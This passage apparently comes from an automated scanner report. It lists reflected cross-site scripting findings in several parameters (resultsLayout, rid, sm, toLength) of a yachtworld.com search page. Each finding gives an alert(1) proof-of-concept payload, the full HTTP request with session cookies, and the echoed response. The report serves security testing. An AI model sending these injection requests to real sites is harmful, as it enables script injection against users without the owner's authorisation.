__utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.22.10.1296155952; s_pers=%20s_nr%3D1296156246717%7C1298748246717%3B%20s_lv%3D1296156246727%7C1390764246727%3B%20s_lv_s%3DFirst%2520Visit%7C1296158046727%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DadvancedSearch_US%252526pidt%25253D1%252526oid%25253DSearch%252526oidt%25253D3%252526ot%25253DSUBMIT%3B; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 27 Jan 2011 19:41:44 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20477

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<br>'+ 'ExceptionMessage: For input string: "725d1';alert(1)//e5c45981bb1"<br>
...[SNIP]...

3.391. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [resultsLayout parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the resultsLayout request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1109'%3balert(1)//e1d13c26d16 was submitted in the resultsLayout parameter. This input was echoed as e1109';alert(1)//e1d13c26d16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&currencyid=100&cit=true&toLength=32&luom=126&fromLength=24&fromPrice=0&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range&resultsLayout=0e1109'%3balert(1)//e1d13c26d16 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 500 Internal Server Error
Date: Thu, 27 Jan 2011 20:13:56 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<br>'+ 'ExceptionMessage: For input string: "0e1109';alert(1)//e1d13c26d16"<br>
...[SNIP]...

3.392. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [rid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the rid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3b13"%3balert(1)//db045c034be was submitted in the rid parameter. This input was echoed as a3b13";alert(1)//db045c034be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?cit=true&slim=quick&ybw=&sm=3&searchtype=homepage&Ntk=boatsEN&Ntt=&is=false&man=regulator&hmid=0&ftid=0&enid=0&fromLength=24&toLength=32&luom=126&fromYear=2004&toYear=&fromPrice=0&toPrice=&currencyid=100&city=&rid=a3b13"%3balert(1)//db045c034be&cint=100&pbsint=&boatsAddedSelected=-1 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/advancedSearch.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&luom=126&currencyid=100&cit=true&toLength=32&fromLength=24&fromPrice=0&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.22.10.1296155952; s_pers=%20s_nr%3D1296156246717%7C1298748246717%3B%20s_lv%3D1296156246727%7C1390764246727%3B%20s_lv_s%3DFirst%2520Visit%7C1296158046727%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DadvancedSearch_US%252526pidt%25253D1%252526oid%25253DSearch%252526oidt%25253D3%252526ot%25253DSUBMIT%3B; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:41:39 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 35282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
e entered"
s.prop11="no search phrase entered"
s.prop12="no search phrase entered"
s.prop13="no search phrase entered"
s.prop14="no search phrase entered"
s.prop15="no search phrase entered"
s.prop16="a3b13";alert(1)//db045c034be"
s.prop17="United States"
s.prop18="no search phrase entered"
s.prop19="zero"
s.prop20="Homepage"
s.prop21="Default"
-->
...[SNIP]...

3.393. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [sm parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the sm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c656'%3balert(1)//1b0ea6fdeb5 was submitted in the sm parameter. This input was echoed as 7c656';alert(1)//1b0ea6fdeb5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=37c656'%3balert(1)//1b0ea6fdeb5&currencyid=100&cit=true&toLength=32&luom=126&fromLength=24&fromPrice=0&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range&No=10 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.12.10.1296155952; s_pers=%20s_nr%3D1296156045407%7C1298748045407%3B%20s_lv%3D1296156045410%7C1390764045410%3B%20s_lv_s%3DFirst%2520Visit%7C1296157845410%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DsearchResults_US%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/cache/searchResults.jsp%2525253FNtk%2525253DboatsEN%25252526searchtype%2525253Dhomepage%25252526fromY%252526ot%25253DA%3B

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 27 Jan 2011 19:39:37 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<br>'+ 'ExceptionMessage: For input string: "37c656';alert(1)//1b0ea6fdeb5"<br>
...[SNIP]...

3.394. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [sm parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the sm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af64c'%3balert(1)//e6763372b5ec28c48 was submitted in the sm parameter. This input was echoed as af64c';alert(1)//e6763372b5ec28c48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?man=regulator&is=false&type=&luom=126&fromLength=24&toLength=32&fromYear=2004&toYear=&pricderange=Select+Price+Range&Ntt=&fromPrice=0&toPrice=&searchtype=homepage&cit=true&slim=quick&ybw=&sm=3af64c'%3balert(1)//e6763372b5ec28c48&Ntk=boatsEN&currencyid=100 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/
Cache-Control: max-age=0
Origin: http://www.yachtworld.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; s_pers=%20s_nr%3D1296155951861%7C1298747951861%3B%20s_lv%3D1296155951863%7C1390763951863%3B%20s_lv_s%3DFirst%2520Visit%7C1296157751863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.2.10.1296155952; savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 27 Jan 2011 19:41:14 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<br>'+ 'ExceptionMessage: For input string: "3af64c';alert(1)//e6763372b5ec28c48"<br>
...[SNIP]...

3.395. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [toLength parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the toLength request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ec31'%3balert(1)//94360dd5dbfae9f10 was submitted in the toLength parameter. This input was echoed as 7ec31';alert(1)//94360dd5dbfae9f10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?man=regulator&is=false&type=&luom=126&fromLength=24&toLength=327ec31'%3balert(1)//94360dd5dbfae9f10&fromYear=2004&toYear=&pricderange=Select+Price+Range&Ntt=&fromPrice=0&toPrice=&searchtype=homepage&cit=true&slim=quick&ybw=&sm=3&Ntk=boatsEN&currencyid=100 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/
Cache-Control: max-age=0
Origin: http://www.yachtworld.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; s_pers=%20s_nr%3D1296155951861%7C1298747951861%3B%20s_lv%3D1296155951863%7C1390763951863%3B%20s_lv_s%3DFirst%2520Visit%7C1296157751863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.2.10.1296155952; savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:08 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
